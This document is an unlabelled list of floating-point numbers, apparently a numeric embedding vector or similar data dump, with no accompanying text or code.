0.00904380064457655, -0.006802614312618971, 0.03487871587276459, -0.017550034448504448, -0.00828488077968359, -0.006233423948287964, 0.0008839248330332339, -0.006976533681154251, -0.01702827587723732, 0.015336515381932259, 0.018150845542550087, 0.01818246766924858, 0.018451251089572906, -0.031115734949707985, 0.03136871010065079, 0.033107902854681015, -0.030198706313967705, -0.0010860071051865816, -0.019194360822439194, 0.010719750076532364, -0.000469384336611256, -0.028965460136532784, 0.041961971670389175, -0.000986201222985983, -0.0011996475514024496, 0.02566099539399147, 0.0062808566726744175, 0.021645041182637215, -0.0003018882416654378, 0.016285166144371033, 0.0062808566726744175, -0.011707928031682968, 0.0073836627416312695, 0.009731573052704334, 0.005778862629085779, -0.02351072058081627, 0.012213874608278275, 0.007921230979263783, -0.00981853250414133, -0.0035554629284888506, -0.005031800363212824, -0.000326345645589754, 0.0005301572382450104, 0.004960651509463787, 0.00932049099355936, 0.016380030661821365, -0.005751193501055241, 0.013668471947312355, 0.005110854282975197, 0.011162454262375832, -0.015605299733579159, 0.049519553780555725, -0.004017930012196302, -0.006462681107223034, 0.015130975283682346, -0.0429106242954731, 0.006612884346395731, 0.00973947811871767, -0.022878287360072136, -0.0025099709164351225, -0.0032649387139827013, 0.01595313847064972, 0.001807376742362976, -0.006348052527755499, -0.028127485886216164, 0.007814507931470871, -0.021929636597633362, 0.0036443988792598248, 0.024538425728678703, 0.009826437570154667, -0.022577881813049316, 0.017123140394687653, -0.015099353156983852, -0.040349267423152924, 0.005431023892015219, 0.007229506969451904, -0.00425706896930933, 0.035163309425115585, -0.016901789233088493, -0.011470764875411987, -0.002859785920009017, 0.021565986797213554, 0.006012072321027517, -0.03190627694129944, -0.00477092107757926, -0.004628623835742474, -0.0003228870336897671, 0.02833302691578865, -0.013881918042898178, -0.013858201913535595, 0.013534080237150192, 0.0002401271485723555, -0.02047503925859928, 0.039748452603816986, -0.006525924429297447, -0.009059611707925797, 0.014838474802672863, -0.0218505822122097, 0.02534477785229683, 0.018830711022019386, -0.00844298955053091, 0.01592942327260971, -0.010166371241211891, -0.01641165278851986, 0.005312442779541016, -0.0020040241070091724, 0.03886304795742035, -0.018150845542550087, -0.017360303550958633, 0.0031661209650337696, 0.01772395335137844, -0.006747276522219181, -0.00034487395896576345, 0.01778719574213028, -0.003593013621866703, 0.014016310684382915, 0.00839555636048317, 0.02725788950920105, 0.0008947947644628584, -0.03652304410934448, -0.0004886537790298462, 0.014277189038693905, 0.005763051565736532, 0.00517409760504961, -0.004118724260479212, 0.006577309686690569, 0.005636564921587706, 0.006000214256346226, 0.02183477208018303, 0.01377914845943451, 0.01103596668690443, -0.0028064243961125612, 0.007494338788092136, 0.0018864310113713145, -0.020032335072755814, -0.014933339320123196, -0.015439285896718502, 0.016395842656493187, -0.02007976733148098, 0.001098853419534862, 0.021581798791885376, 0.006047646515071392, 0.019684497267007828, -0.008190015330910683, -0.008110961876809597, -0.009336302056908607, 0.0024882310535758734, 0.0018834664952009916, -0.009644612669944763, 0.021739905700087547, -0.014261378906667233, 0.017818817868828773, 0.003181931795552373, -0.013668471947312355, -0.0012332455953583121, -0.021439500153064728, -0.029993165284395218, 0.011858130805194378, 0.0031918135937303305, -0.017044086009263992, 0.0005924124270677567, 0.00878292229026556, -0.0050278473645448685, 0.004707677755504847, -0.018135035410523415, 0.008059576153755188, -0.020427606999874115, 0.0043993666768074036, -0.004517947789281607, 0.006039741449058056, 0.00985805969685316, 0.018846523016691208, 0.030024787411093712, 0.01840381883084774, -0.02382693812251091, 0.017818817868828773, 0.010474681854248047, -0.014688271097838879, 0.019289225339889526, -0.002697724848985672, -0.012055766768753529, 0.005209672264754772, -0.004909266252070665, 0.007664305157959461, -0.014316716231405735, -0.003209600690752268, 0.02374788373708725, -0.009407450444996357, -0.004814401268959045, 0.017692331224679947, -0.0008765134843997657, -0.0032352933194488287, 0.014379959553480148, -0.005478456616401672, -0.017976926639676094, 0.001168025890365243, 0.014830568805336952, 0.030957626178860664, -0.028427891433238983, 0.013146714307367802, 0.015012393705546856, -0.017850439995527267, -0.0072690341621637344, -0.022467205300927162, 0.005261057522147894, -0.004110818728804588, 0.00913076102733612, 0.01111502107232809, 0.00443098833784461, -0.024617480114102364, -0.012854213826358318, -0.02260950207710266, -0.0050278473645448685, -0.009873869828879833, -0.004138487856835127, -0.0018607383826747537, -0.0014694200363010168, 0.007249270565807819, -0.03016708418726921, -0.03873655945062637, 0.02183477208018303, 0.005873727612197399, 0.026293428614735603, -0.022862475365400314, -0.003891443368047476, 0.03351898491382599, -0.015328610315918922, 0.030261950567364693, -0.011194075457751751, 0.014822663739323616, -0.017123140394687653, -0.01908368431031704, 0.0030297525227069855, 0.003405259922146797, 0.01840381883084774, -0.0016502565704286098, -0.013194146566092968, -0.0016344457399100065, 0.007917278446257114, 0.00932049099355936, 0.015684355050325394, 0.007023965939879417, -0.02123395912349224, 0.011897657997906208, -0.009652518667280674, -0.007842177525162697, 0.026830997318029404, -0.008956841193139553, -0.02159760892391205, 0.008656435646116734, 0.010221708565950394, 0.0012875953689217567, 0.00881454348564148, 0.005015989299863577, -0.013557796366512775, 0.005138523411005735, 0.023194503039121628, -0.012103199027478695, 0.020443417131900787, 0.008158394135534763, 0.023226125165820122, 0.012751443311572075, -0.0062650456093251705, -0.01734449341893196, 0.0021324872504919767, -0.021866392344236374, 0.016087530180811882, -0.014490636065602303, 0.010664412751793861, -0.000765343545936048, -0.003618706250563264, -0.013107187114655972, -0.02558194100856781, -0.002336051780730486, 0.004051527939736843, 0.0030574214179068804, 0.00456538051366806, 0.010435154661536217, -0.004577238578349352, -0.004280785098671913, 0.003525817533954978, 0.027621539309620857, -0.005284773651510477, 0.02039598487317562, -0.00890150386840105, 0.00553774693980813, -0.010688128881156445, 0.0050238948315382, -0.021044230088591576, 0.01932084746658802, 0.008035860024392605, 0.007711737882345915, 0.013621039688587189, 0.009557653218507767, -0.0051582870073616505, -0.004759063012897968, -0.018814900889992714, 0.008118866942822933, 0.014957055449485779, -0.013621039688587189, -0.0006477503920905292, -0.02757410705089569, -0.012071576900780201, 0.012933268211781979, 0.017439357936382294, -0.009288868866860867, 0.031795602291822433, -0.021328825503587723, 0.007561534643173218, 0.02268855646252632, 0.01446691993623972, -0.024158965796232224, -0.012427320703864098, -0.006632647942751646, -0.035100068897008896, 0.007984474301338196, 0.0032886548433452845, 0.00836393516510725, 0.017581654712557793, -0.023637207224965096, 0.003950733691453934, 0.009976640343666077, -0.0015376042574644089, -0.01034819521009922, -0.0172654390335083, -0.003778791055083275, 0.0019536269828677177, 0.01607172004878521, -0.004102913197129965, -0.026910051703453064, 0.014300906099379063, 0.0020652911625802517, -0.009676234796643257, -0.005778862629085779, 0.0014328574761748314, -0.002173990709707141, 0.01694922149181366, -0.042183324694633484, 0.0014931362820789218, 0.008561570197343826, 0.008869881741702557, -0.0167278703302145, 0.007759170141071081, -0.015241650864481926, -0.02230909653007984, -0.003822270780801773, -0.02015882171690464, -0.016980843618512154, -0.013921445235610008, -0.008640624582767487, -0.007585250772535801, 0.00769197428599, 0.0009778017411008477, 0.0005464621935971081, -0.019558010622859, 0.002632505027577281, -0.009731573052704334, 0.0027095829136669636, 0.022245854139328003, 0.0030080124270170927, 0.0042175417765975, 0.007802649866789579, 0.010877858847379684, 0.028048431500792503, 0.0030554451514035463, -0.011581441387534142, -0.005913254339247942, 0.005284773651510477, -0.00040045895730145276, 0.01962125301361084, 0.010205897502601147, 0.02030112035572529, -0.01870422437787056, -0.009035895578563213, 0.0036364933475852013, -0.005755146034061909, 0.024301262572407722, -0.003229364287108183, -0.022546259686350822, -0.013407593593001366, 0.0018548093503341079, 0.0025020656175911427, 0.012443131767213345, 0.0016818782314658165, -0.012846308760344982, -0.018878145143389702, 0.007446906063705683, -0.002397318836301565, -0.006553593557327986, -0.0033005131408572197, -0.006660316605120897, -0.0007554617477580905, 0.003336087567731738, -0.003707642201334238, -0.010379817336797714, 0.004921124316751957, -0.009960830211639404, 0.010727656073868275, -0.008261164650321007, -0.0018686437979340553, -0.009186098352074623, 0.03174816817045212, 0.021787339821457863, 0.012039955705404282, -0.03766142204403877, -0.0061662280932068825, -0.006996297277510166, -0.021202336996793747, 0.004075244069099426, 0.015336515381932259, 0.013834485784173012, 0.0003295572241768241, 0.020332742482423782, 0.011818603612482548, 0.008276975713670254, -0.018672604113817215, 0.00590139627456665, 0.03664952889084816, -0.010941102169454098, 0.030040597543120384, 0.016474897041916847, 0.006383627187460661, 0.009328396059572697, -0.011747455224394798, 0.00839555636048317, -0.000388847867725417, 0.001972402445971966, 0.027827080339193344, -0.002561356173828244, -0.01840381883084774, -0.006063457578420639, 0.034024931490421295, -0.013075565919280052, 0.01985841616988182, -0.0054665980860590935, -0.006798661779612303, -0.0027787552680820227, -0.023115450516343117, 0.00051335827447474, -0.013549890369176865, 0.0007376745343208313, -0.012901646085083485, -0.01710733026266098, 0.006478492170572281, 0.004881597124040127, -0.023573964834213257, 0.027305321767926216, 0.003727405797690153, -0.007984474301338196, 0.012617051601409912, 0.002442775061354041, -0.024143153801560402, -0.004419130273163319, -0.029724381864070892, -0.0069488645531237125, 0.022245854139328003, 0.012577524408698082, 0.007051635067909956, 0.0016818782314658165, 0.010126844048500061, 0.010814615525305271, 0.014356243424117565, 0.0007935065659694374, -0.008253258652985096, 0.03826223686337471, 0.021344635635614395, -0.0028736202511936426, 0.024222208186984062, 0.0167278703302145, 0.006992344278842211, 0.00021826372540090233, -0.015502529218792915, -0.004656292498111725, -0.0022728084586560726, -0.022530447691679, -0.00014303870557341725, 0.010814615525305271, -0.009573464281857014, -0.005707713775336742, 0.0003599436895456165, -0.0072729866951704025, 0.01864098198711872, 0.01826152205467224, -0.0027076066471636295, 0.004340075887739658, -0.011755360290408134, -0.0010850189719349146, -0.004229399841278791, 0.011462859809398651, -0.007450859062373638, -0.0025751907378435135, -0.019036252051591873, -0.007450859062373638, 0.009407450444996357, -0.0035554629284888506, 0.008269069716334343, 0.02205612324178219, -0.008450894616544247, -0.002492183819413185, 0.019273415207862854, 0.0025238054804503918, -0.0018221994396299124, 0.01591361127793789, -0.002634481294080615, -0.003523841267451644, 0.006344099994748831, 0.031178979203104973, -0.010450965724885464, 0.0036918313708156347, -0.008688056841492653, 0.004241257905960083, 0.011905563063919544, 0.005929065402597189, -0.0061504170298576355, -0.006778898183256388, -0.01019799243658781, -0.0030732322484254837, 0.015312799252569675, 0.012095293030142784, 0.0032550569158047438, -0.012324550189077854, -0.015787124633789062, -0.0037866963539272547, 0.000986201222985983, 0.011217791587114334, 0.013953067362308502, 0.011794887483119965, 0.0018202230567112565, 0.03563763573765755, -0.0060357884503901005, -0.000029274760890984908, 0.001283642603084445, 0.016838544979691505, -0.024301262572407722, 0.003498148638755083, -0.0006358922692015767, 0.0323806032538414, -0.011312657035887241, 0.0010118938516825438, 0.007308561354875565, -0.006383627187460661, 0.0020099531393498182, -0.011960901319980621, 0.013447120785713196, -0.00859319232404232, 0.012316645123064518, 0.004261021502315998, 0.010371911339461803, 0.002699701115489006, -0.0016403747722506523, 0.00954974815249443, 0.004510042257606983, 0.004624670837074518, -0.011794887483119965, 0.031495194882154465, -0.004786732140928507, 0.02536058984696865, -0.005328253377228975, -0.0015968949301168323, -0.012759348377585411, 0.0027352755423635244, 0.023162882775068283, 0.005000178702175617, -0.008490421809256077, 0.0000061722498685412575, 0.014870095998048782, -0.02627761848270893, -0.010182181373238564, 0.0407603494822979, -0.0026700557209551334, 0.002672032220289111, -0.03106830269098282, 0.0027115591801702976, 0.005561463534832001, -0.012300834059715271, 0.01007941085845232, 0.017834628000855446, -0.00962089654058218, 0.00044764444464817643, 0.011249413713812828, 0.011771171353757381, -0.014893812127411366, 0.003061374183744192, 0.008182110264897346, 0.01770814135670662, -0.024222208186984062, 0.0036285880487412214, -0.003227388020604849, 0.008846165612339973, 0.00047605455620214343, 0.014443202875554562, -0.00817420519888401, 0.00467605609446764, 0.010411438532173634, -0.004102913197129965, 0.003134499303996563, 0.002401271602138877, 0.005964639596641064, -0.0029447691049426794, 0.008237448520958424, 0.012237590737640858, -0.004371697548776865, -0.002223399467766285, 0.028506945818662643, 0.018214089795947075, 0.015091448090970516, -0.014474825002253056, 0.00835602916777134, -0.010949007235467434, -0.0019022418418899179, 0.0020475038327276707, 0.013130903244018555, 0.005794673226773739, 0.01756584458053112, 0.012664483860135078, 0.01046677678823471, 0.017581654712557793, -0.016474897041916847, 0.010949007235467434, -0.0021720142103731632, -0.005087138153612614, 0.010838331654667854, 0.009454882703721523, 0.002790613565593958, 0.01134427823126316, -0.01030866801738739, -0.013020227663218975, -0.01450644712895155, 0.002357791643589735, -0.009605086408555508, 0.010190087370574474, -0.0005538735422305763, 0.0003023823373951018, -0.021486932411789894, -0.003802507184445858, -0.001996118575334549, 0.002130510751157999, 0.008522043004631996, 0.019273415207862854, 0.011320562101900578, -0.005751193501055241, -0.012395699508488178, -0.011130832135677338, -0.03285492956638336, 0.011360089294612408, 0.004102913197129965, -0.0018182466737926006, -0.012103199027478695, -0.007605014368891716, -0.005225482862442732, 0.01772395335137844, -0.0030989248771220446, 0.011541914194822311, -0.013557796366512775, 0.0016749609494581819, -0.017312871292233467, 0.01963706500828266, 0.026925861835479736, 0.018308954313397408, -0.019953280687332153, -0.013905635103583336, 0.0038855141028761864, -0.010150560177862644, -0.021028418093919754, -0.020886121317744255, 0.011217791587114334, 0.0037590274587273598, 0.007877751253545284, 0.00765244709327817, 0.0017243698239326477, 0.00035006189136765897, -0.025139236822724342, -0.006312478333711624, 0.008498326875269413, -0.025787482038140297, 0.015328610315918922, 0.010917386040091515, 0.003069279482588172, -0.015549962408840656, -0.002727370010688901, -0.021486932411789894, -0.011043872684240341, -0.006921195890754461, 0.00912285503000021, -0.009715761989355087, -0.0033598036970943213, -0.015486719086766243, 0.01027704682201147, -0.0013636850053444505, 0.013241579756140709, 0.022546259686350822, 0.02839627116918564, 0.0013804840855300426, -0.025455454364418983, 0.011707928031682968, 0.003486290341243148, -0.00534801697358489, -0.03184303268790245, -0.004193825647234917, -0.0036997369024902582, 0.016364220529794693, 0.003845987142995, -0.006616836879402399, -0.020585715770721436, 0.013407593593001366, 0.011818603612482548, 0.00371159496717155, 0.01832476444542408, -0.01023751962929964, -0.007913325913250446, 0.024000857025384903, -0.0059409234672784805, -0.022577881813049316, 0.003061374183744192, -0.0202378761023283, 0.010395628400146961, 0.0186251699924469, 0.018198277801275253, -0.007581298239529133, 0.02986667864024639, -0.013470836915075779, 0.006134606432169676, 0.0012332455953583121, -0.004063386004418135, -0.020253688097000122, -0.016395842656493187, -0.01050630398094654, 0.002083078259602189, 0.005415213294327259, 0.010751372203230858, -0.022925719618797302, -0.020127201452851295, -0.007031871471554041, 0.003713571233674884, -0.029566273093223572, 0.01626935601234436, 0.012711916118860245, -0.005850011017173529, -0.0008305632509291172, -0.004415177274495363, -0.005747240502387285, -0.006391532719135284, -0.009423261508345604, -0.005375686101615429, 0.026846807450056076, -0.000538062711711973, 0.005419165827333927, -0.030119651928544044, -0.017044086009263992, 0.006466634105890989, -0.0019259580876678228, -0.020063957199454308, 0.0092414366081357, 0.013518269173800945, 0.0033024894073605537, 0.003340040100738406, -0.024791399016976357, -0.01534442137926817, -0.006411295849829912, 0.02428545244038105, 0.008680151775479317, -0.007877751253545284, -0.0012480682926252484, 0.0014486683066934347, 0.003456645179539919, 0.00026359636103734374, -0.001534639741294086, -0.0012026120675727725, 0.01007941085845232, -0.022103555500507355, 0.016965031623840332, 0.02328936941921711, 0.013130903244018555, 0.0038973724003881216, 0.01599266566336155, 0.0019763552118092775, 0.004347981419414282, 0.00916238222271204, -0.03842034563422203, 0.00389341963455081, 0.016380030661821365, -0.01854611746966839, -0.0180876012891531, -0.030894383788108826, 0.009035895578563213, -0.0008058588136918843, 0.0010138702346011996, -0.030530733987689018, 0.02618275210261345, 0.014759420417249203, 0.010016167536377907, -0.015644827857613564, 0.03250708803534508, -0.0005197813734412193, -0.005569368600845337, -0.017138952389359474, -0.00425706896930933, 0.008067481219768524, -0.02199288085103035, 0.03351898491382599, 0.011399616487324238, 0.017123140394687653, -0.012775159440934658, 0.003504077671095729, -0.0028716439846903086, -0.019558010622859, -0.005035752896219492, 0.002450680360198021, -0.009004274383187294, -0.020443417131900787, 0.020143011584877968, 0.0012470800429582596, -0.01756584458053112, 0.001783660496585071, 0.003484314074739814, 0.007087209727615118, -0.011873941868543625, -0.03000897727906704, -0.0024131296668201685, 0.009731573052704334, -0.03190627694129944, 0.0016532210865989327, 0.004025835543870926, -0.01816665567457676, -0.002089007291942835, -0.015660637989640236, -0.003181931795552373, -0.0014377983752638102, 0.003660209709778428, 0.006798661779612303, -0.004498184192925692, -0.007565487641841173, -0.0005642494070343673, 0.01908368431031704, -0.00042368113645352423, 0.006664269603788853, -0.006249235011637211, 0.004237305372953415, -0.004185920115560293, 0.005925112869590521, -0.004300548695027828, 0.0020237877033650875, 0.005822342354804277, -0.016055909916758537, -0.0020712201949208975, -0.004138487856835127, 0.00526896258816123, 0.0004758074937853962, -0.018925577402114868, -0.030514923855662346, -0.009723667055368423, -0.00936001818627119, 0.005794673226773739, -0.0010790899395942688, -0.011881846934556961, -0.007075351197272539, -0.01732868142426014, -0.016040097922086716, -0.017423545941710472, -0.009597180411219597, 0.026830997318029404, 0.0004580203094519675, -0.025139236822724342, 0.001880501862615347, -0.01500448863953352, 0.013439214788377285, 0.022846665233373642, 0.007300655823200941, -0.009154477156698704, -0.0030554451514035463, 0.015881989151239395, -0.009138666093349457, 0.013534080237150192, -0.011668400838971138, 0.012537997215986252, 0.004371697548776865, 0.005245246458798647, -0.003156239166855812, 0.027384376153349876, 0.0018834664952009916, 0.02711559273302555, -0.008988463319838047, -0.008648529648780823, -0.012016239576041698, 0.0095102209597826, -0.013375971466302872, -0.00034956782474182546, 0.02159760892391205, -0.00044319764128886163, 0.011636778712272644, 0.011700022034347057, 0.0026621504221111536, -0.015668543055653572, 0.004209636244922876, -0.014838474802672863, -0.013423403725028038, -0.009178193286061287, 0.013391782529652119, 0.013510364107787609, 0.005976498126983643, 0.016048002988100052, 0.017676521092653275, -0.00013377453433349729, 0.004802543204277754, -0.013976783491671085, -0.001142333261668682, 0.0006996297161094844, 0.02382693812251091, -0.008466705679893494, -0.014451108872890472, 0.014593406580388546, -0.007577345706522465, -0.019273415207862854, 0.013478741981089115, -0.00962880253791809, -0.00417801458388567, 0.0008187051280401647, -0.011897657997906208, 0.024933695793151855, 0.013565701432526112, 0.004454704467207193, 0.010087316855788231, -0.016055909916758537, 0.00847461074590683, 0.01917855069041252, -0.020443417131900787, 0.009217720478773117, -0.02757410705089569, 0.00928096380084753, -0.0016848427476361394, -0.011842319741845131, -0.016182396560907364, -0.015763409435749054, -0.0017352397553622723, -0.020807066932320595, -0.007565487641841173, 0.007051635067909956, -0.021977068856358528, 0.002332099014893174, -0.009107044897973537, -0.006391532719135284, -0.013652660883963108, 0.021202336996793747, -0.0022392102982848883, -0.006019977852702141, 0.026562213897705078, -0.014933339320123196, -0.007913325913250446, 0.016822734847664833, -0.013217862695455551, 0.010229614563286304, -0.01050630398094654, 0.0012846308527514338, -0.006727512925863266, 0.00065170309972018, -0.00874339509755373, -0.02673613280057907, 0.00406733900308609, -0.01971611939370632, -0.003138451837003231, -0.007359946612268686, -0.026751942932605743, 0.001097865286283195, -0.012150631286203861, -0.020585715770721436, -0.000015200950656435452, 0.00878292229026556, -0.0016789137152954936, -0.023273557424545288, 0.03377195820212364, -0.00765244709327817, 0.004095007665455341, -0.007454811595380306, -0.0006284809205681086, -0.018530305474996567, 0.004205683711916208, 0.0003357333189342171, 0.010798804461956024, 0.012166442349553108, -0.008466705679893494, -0.007893562316894531, 0.0006561499321833253, 0.0003641434304881841, -0.0012253401800990105, 0.011873941868543625, 0.0034013071563094854, -0.006102984771132469, 0.004731394350528717, 0.0072887977585196495, -0.00031226410646922886, 0.012624956667423248, -0.013723810203373432, 0.005774909630417824, -0.0023004773538559675, -0.001440762891434133, -0.007446906063705683, 0.003043586853891611, -0.019510578364133835, -0.0015188289107754827, 0.007506196852773428, -0.012134820222854614, -0.009027990512549877, -0.0069646756164729595, 0.004221494775265455, 0.004743252415210009, -0.01748679019510746, 0.01057745236903429, 0.00343490531668067, -0.004683961626142263, 0.0087038679048419, -0.02381112612783909, 0.007300655823200941, -0.005569368600845337, -0.0016077648615464568, -0.0006265045958571136, 0.017218006774783134, -0.011217791587114334, 0.0008275987347587943, 0.0030732322484254837, 0.018846523016691208, -0.009715761989355087, 0.011486575938761234, -0.033487360924482346, 0.03443601354956627, 0.007466669660061598, 0.005755146034061909, 0.008221637457609177, 0.005676092114299536, 0.00797656923532486, 0.00840346235781908, 0.009415355511009693, -0.02857019007205963, 0.007348088547587395, 0.0016571737360209227, 0.02809586375951767, -0.02482302114367485, -0.003620682517066598, -0.0015366161242127419, 0.012451037764549255, -0.0004965592524968088, 0.008680151775479317, 0.018577737733721733, 0.006553593557327986, -0.024680722504854202, 0.013083470985293388, 0.0044586570002138615, -0.01557367853820324, 0.02344747819006443, 0.013051848858594894, -0.013257389888167381, 0.01710733026266098, 0.04189872741699219, -0.0197003073990345, 0.00011055236245738342, -0.006739370990544558, 0.00462071830406785, 0.007877751253545284, 0.0034151417203247547, 0.013194146566092968, -0.006387579720467329, 0.012569618411362171, -0.00947069376707077, -0.020569903776049614, 0.0008641612948849797, -0.001645315671339631, -0.011960901319980621, 0.00206133839674294, 0.005853964015841484, 0.016364220529794693, -0.009715761989355087, 0.023178692907094955, -0.015146785415709019, 0.011818603612482548, 0.020253688097000122, -0.0068342359736561775, 0.005648422986268997, -0.01588989607989788, 0.01963706500828266, 0.009992451407015324, -0.0000019416145278228214, -0.008340219035744667, 0.004743252415210009, 0.01530489418655634, -0.03236479312181473, -0.0067551820538938046, 0.00824535358697176, -0.0035969663877040148, 0.018040169030427933, 0.017044086009263992, 0.004213589243590832, -0.0069488645531237125, 0.01019799243658781, -0.019747739657759666, -0.0207754448056221, 0.0010445036459714174, -0.036301691085100174, 0.007589203771203756, 0.007593156304210424, -0.0037886728532612324, -0.00417801458388567, 0.009383734315633774, 0.027684783563017845, -0.011700022034347057, 0.00882244948297739, -0.0012006358010694385, 0.0047195362858474255, 0.011375900357961655, 0.010482587851583958, 0.0021146999206393957, 0.008909408934414387, 0.006118795368820429, -0.0051622395403683186, -0.0184828732162714, 0.013605228625237942, 0.027147214859724045, -0.02015882171690464, 0.007601061835885048, -0.009644612669944763, 0.0184828732162714, -0.010261235758662224, 0.0183405764400959, 0.01992166042327881, -0.011083399876952171, -0.022245854139328003, -0.016553951427340508, 0.0033598036970943213, 0.025075994431972504, -0.0066049788147211075, 0.011423332616686821, -0.02480720914900303, 0.0063954852521419525, 0.015439285896718502, -0.005680044647306204, 0.04237305372953415, -0.0207754448056221, 0.00026384342345409095, -0.0028301405254751444, 0.020569903776049614, -0.0066207898780703545, 0.01011893805116415, -0.01748679019510746, -0.006743323523551226, 0.007664305157959461, 0.00858528632670641, 0.006209707818925381, -0.005146428942680359, -0.017123140394687653, -0.009336302056908607, -0.00397247401997447, -0.013834485784173012, 0.0053677805699408054, -0.002375578973442316, 0.02534477785229683, 0.006514066364616156, 0.023463288322091103, -0.006996297277510166, -0.00759710930287838, 0.019036252051591873, -0.0009224637760780752, 0.008142583072185516, -0.012759348377585411, -0.019352469593286514, 0.023241937160491943, 0.016395842656493187, -0.02289409749209881, 0.033487360924482346, 0.017044086009263992, 0.00404362240806222, 0.02289409749209881, -0.013573607429862022, 0.011067588813602924, 0.03177979215979576, 0.004731394350528717, -0.0031858845613896847, 0.0011808722047135234, -0.01840381883084774, 0.0064943027682602406, 0.012688199989497662, -0.002879549516364932, 0.010364006273448467, 0.027004916220903397, -0.0009857071563601494, -0.017676521092653275, 0.006739370990544558, -0.005355922505259514, 0.005071327090263367, 0.005980450659990311, -0.02611950971186161, -0.002375578973442316, -0.014024215750396252, 0.0009155464940704405, -0.002604836132377386, -0.008197921328246593, 0.028285594657063484, 0.013731715269386768, 0.0186251699924469, -0.018498683348298073, -0.0069291009567677975, -0.025392210111021996, 0.0044586570002138615, -0.0060555520467460155, -0.020743822678923607, 0.005051563493907452, 0.004857880994677544, 0.00447051553055644, 0.014988677576184273, 0.004557474981993437, -0.0029605799354612827, 0.001372578670270741, -0.021629231050610542, 0.008609003387391567, -0.0033103949390351772, -0.011281034909188747, 0.004830211866647005, -0.009573464281857014, -0.012490564025938511, -0.009486504830420017, 0.0016275284579023719, 0.023115450516343117, -0.005490314681082964, -0.0058262948878109455, 0.00943116657435894, -0.02313126064836979, 0.0003157227183692157, 0.019890038296580315, 0.004881597124040127, 0.010356101207435131, 0.0010104115353897214, 0.001511911628767848, -0.004347981419414282, 0.015447191894054413, 0.00840346235781908, -0.0404757522046566, -0.00022863959020469338, -0.001975366845726967, -0.00917028822004795, -0.010371911339461803, 0.005517983343452215, -0.007221601437777281, -0.00045283237705007195, -0.02566099539399147, 0.013518269173800945, 0.022783422842621803, -0.017834628000855446, -0.01925760507583618, -0.012672388926148415, 0.005015989299863577, 0.016854356974363327, -0.02115490473806858, -0.0073994738049805164, -0.0010128819849342108, 0.002834093291312456, 0.033455740660429, 0.011747455224394798, 0.02055409364402294, -0.012964889407157898, 0.007810555398464203, 0.0056168013252317905, 0.0011373923625797033, 0.013202052563428879, 0.010016167536377907, -0.014996582642197609, -0.01649070717394352, -0.0051622395403683186, 0.002130510751157999, 0.006672175135463476, -0.011012250557541847, -0.011288940906524658, 0.01607172004878521, 0.00040688211447559297, 0.0040218825452029705, -0.010142654180526733, -0.014158608391880989, -0.016119152307510376, 0.013534080237150192, -0.0023281462490558624, 0.0031443811021745205, 0.018150845542550087, 0.02771640382707119, -0.017012465745210648, -0.015296989120543003, -0.00022901015472598374, 0.019273415207862854, -0.0032194824889302254, 0.03304465860128403, -0.005992308724671602, 0.015684355050325394, -0.014498541131615639, -0.021739905700087547, 0.013747526332736015, -0.004213589243590832, 0.011676305904984474, 0.0008943006978370249, -0.021708285436034203, -0.0031206647399812937, 0.005952781531959772, -0.003413165220990777, 0.01772395335137844, 0.03132127597928047, 0.028000999242067337, -0.007130689453333616, -0.006885621231049299, 0.0036938076373189688, 0.00886197667568922, -0.005423118360340595, -0.003753098426386714, -0.0014733728021383286, -0.010166371241211891, -0.0051622395403683186, 0.01756584458053112, 0.001694724545814097, -0.0035594156943261623, -0.018957197666168213, -0.0202378761023283, -0.015107258222997189, -0.02526572346687317, -0.007980521768331528, -0.0011808722047135234, 0.02305220626294613, 0.00444679893553257, 0.011897657997906208, -0.0003782249696087092, -0.0151151642203331, 0.011217791587114334, -0.008261164650321007, 0.008964747190475464, -0.01103596668690443, 0.0023874370381236076, -0.012767254374921322, 0.02085449919104576, 0.0003611789143178612, -0.013984688557684422, -0.03070465289056301, -0.010103126987814903, 0.021328825503587723, 0.025328967720270157, 0.004091055132448673, -0.0014269284438341856, -0.020664770156145096, -0.006589168217033148, 0.007284845225512981, -0.0042847380973398685, 0.018451251089572906, 0.013368066400289536, 0.022530447691679, -0.010877858847379684, -0.01465664990246296, -0.003994213882833719, 0.03015127405524254, -0.019194360822439194, 0.015241650864481926, -0.00962089654058218, -0.004759063012897968, 0.005498220212757587, 0.005201766733080149, -0.007253223564475775, 0.044017381966114044, -0.0002509971091058105, -0.00103066919837147, -0.010956913232803345, -0.006328288931399584, 0.010300762951374054, -0.01634841039776802, -0.023573964834213257, -0.025518696755170822, 0.021898014470934868, -0.007506196852773428, -0.008751300163567066, 0.007767075672745705, -0.004320312291383743, -0.016585571691393852, -0.010182181373238564, -0.006612884346395731, -0.000056048196711344644, 0.0030989248771220446, -0.01038772240281105, 0.005585179664194584, 0.0184828732162714, 0.025139236822724342, 0.005687950178980827, -0.024680722504854202, -0.017423545941710472, -0.00904380064457655, 0.006138558965176344, -0.0018251639558002353, -0.003203671658411622, -0.003298536641523242, 0.005095043685287237, 0.010514209046959877, -0.013059754855930805, -0.006189944222569466, -0.004434940870851278, -0.006612884346395731, 0.0025079946499317884, -0.0015593442367389798, 0.01107549387961626, 0.024317072704434395, 0.012933268211781979, 0.014814757741987705, 0.0038499399088323116, -0.007391568273305893, -0.003272844012826681, -0.0037412403617054224, -0.004075244069099426, 0.007142547518014908, 0.0022332812659442425, 0.013881918042898178, 0.030119651928544044, 0.004304501693695784, -0.004925076849758625, 0.001328110694885254, -0.011676305904984474, -0.0016304929740726948, 0.0038380816113203764, 0.011391711421310902, -0.027906134724617004, 0.02779545821249485, 0.009209814481437206, 0.0026463395915925503, 0.005494267214089632, 0.0053519695065915585, 0.002753062639385462, 0.0026186704635620117, 0.023953424766659737, -0.03642817959189415, -0.008909408934414387, -0.0022945483215153217, 0.026435725390911102, 0.020807066932320595, 0.010000357404351234, -0.025471264496445656, -0.010648601688444614, 0.020127201452851295, 0.03304465860128403, 0.00402781181037426, -0.010458871722221375, -0.005909301806241274, 0.014435297809541225, -0.01679111272096634, -0.033487360924482346, 0.022166799753904343, 0.009383734315633774, 0.0004965592524968088, -0.004075244069099426, 0.0019585678819566965, 0.008075387217104435, 0.034625742584466934, 0.0030574214179068804, 0.004644434433430433, 0.02482302114367485, 0.015866179019212723, -0.004462609998881817, -0.01770814135670662, -0.0014704081695526838, -0.0008878775406628847, 0.02260950207710266, 0.0010800780728459358, -0.0017125117592513561, -0.001740180654451251, -0.014577595517039299, -0.011099210008978844, -0.0345308780670166, 0.011968806385993958, 0.0021423690486699343, 0.0015385925071313977, 0.015470908023416996, -0.02955046109855175, -0.017897872254252434, -0.008490421809256077, -0.0012875953689217567, -0.0005360863287933171, 0.00962089654058218, 0.020949363708496094, -0.014435297809541225, 